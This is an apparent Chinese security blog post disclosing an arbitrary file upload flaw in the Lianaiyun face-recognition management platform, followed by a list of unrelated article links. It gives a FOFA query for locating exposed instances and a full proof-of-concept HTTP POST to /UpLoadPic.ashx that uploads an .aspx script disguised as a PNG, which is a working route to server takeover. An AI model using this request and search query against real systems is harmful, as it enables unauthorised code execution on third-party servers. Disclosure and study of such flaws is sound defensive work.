当前位置: 首页 > news >正文

脸爱云管理系统存在任意文件上传漏洞

漏洞描述

脸爱云一脸通智慧管理平台是一套功能强大、运行稳定、操作简单方便、用户界面美观的一脸通系统。该平台整合了人脸识别技术和智能化解决方案,可以实现识别和管理个体身份,为各种场景提供便捷的身份验证和管理功能。其存在任意文件上传漏洞,攻击者可通过此漏洞上传文件,进而控制服务器。

漏洞复现

FOFA

title=="欢迎使用脸爱云 一脸通智慧管理平台"

POC

POST /UpLoadPic.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywt7cEu1eBdibB13u
X-Requested-With: XMLHttpRequest
Content-Length: 419Connection: close
------WebKitFormBoundarywt7cEu1eBdibB13u
Content-Disposition: form-data; name="action"post
------WebKitFormBoundarywt7cEu1eBdibB13u
Content-Disposition: form-data; name="myPhoto"; filename="1.aspx"
Content-Type: image/png<% response.write("yga") %>
------WebKitFormBoundarywt7cEu1eBdibB13u
Content-Disposition: form-data; name="oldName"------WebKitFormBoundarywt7cEu1eBdibB13u--

bp

访问文件查看 上传成功

相关文章:

  • UI设计师面试整理-设计过程和方法论
  • 基于SSM的宠物领养管理系统的设计与实现 (含源码+sql+视频导入教程+文档+PPT)
  • JavaScript网页设计案例深度解析:从理论到实践
  • P10250 [GESP样题 六级] 下楼梯 题解
  • JS网页设计案例
  • 深入解析Excel文件格式:.xls与.xlsx的差异与应用指南
  • [Uninstall] 软件彻底卸载工具的下载及详细安装使用过程(附有下载文件)
  • 前端——js补充
  • 大数据毕业设计选题推荐-国潮男装微博评论数据分析系统-Hive-Hadoop-Spark
  • 大厂面试真题-介绍以下Docker的Overlay网络
  • 【AAOS】CarService -- Android汽车服务
  • 机器学习:opencv--摄像头OCR
  • ireport 5.1 中文生辟字显示不出来,生成PDF报字体找不到
  • Python爬虫之requests(二)
  • 基于SSM+Vue+MySQL的在线视频学习系统
  • [分享]iOS开发-关于在xcode中引用文件夹右边出现问号的解决办法
  • 【node学习】协程
  • 【前端学习】-粗谈选择器
  • CentOS 7 修改主机名
  • CSS3 聊天气泡框以及 inherit、currentColor 关键字
  • echarts花样作死的坑
  • ECS应用管理最佳实践
  • Essential Studio for ASP.NET Web Forms 2017 v2,新增自定义树形网格工具栏
  • Java 23种设计模式 之单例模式 7种实现方式
  • java8-模拟hadoop
  • Javascript设计模式学习之Observer(观察者)模式
  • jquery cookie
  • spring boot 整合mybatis 无法输出sql的问题
  • Terraform入门 - 3. 变更基础设施
  • Vue2.x学习三:事件处理生命周期钩子
  • 关于Java中分层中遇到的一些问题
  • 每天10道Java面试题,跟我走,offer有!
  • 面试遇到的一些题
  • 软件开发学习的5大技巧,你知道吗?
  • 一些基于React、Vue、Node.js、MongoDB技术栈的实践项目
  • 《TCP IP 详解卷1:协议》阅读笔记 - 第六章
  • 国内开源镜像站点
  • 树莓派用上kodexplorer也能玩成私有网盘
  • ​数据链路层——流量控制可靠传输机制 ​
  • ​一帧图像的Android之旅 :应用的首个绘制请求
  • #Linux(帮助手册)
  • %3cli%3e连接html页面,html+canvas实现屏幕截取
  • (1)Hilt的基本概念和使用
  • (NO.00004)iOS实现打砖块游戏(十二):伸缩自如,我是如意金箍棒(上)!
  • (PySpark)RDD实验实战——取最大数出现的次数
  • (篇九)MySQL常用内置函数
  • (已解决)报错:Could not load the Qt platform plugin “xcb“
  • (转)Google的Objective-C编码规范
  • .NET CORE 3.1 集成JWT鉴权和授权2
  • .Net Core/.Net6/.Net8 ,启动配置/Program.cs 配置
  • .net core使用ef 6
  • .net framework4与其client profile版本的区别
  • .net2005怎么读string形的xml,不是xml文件。
  • .NET连接数据库方式
  • @Autowired和@Resource装配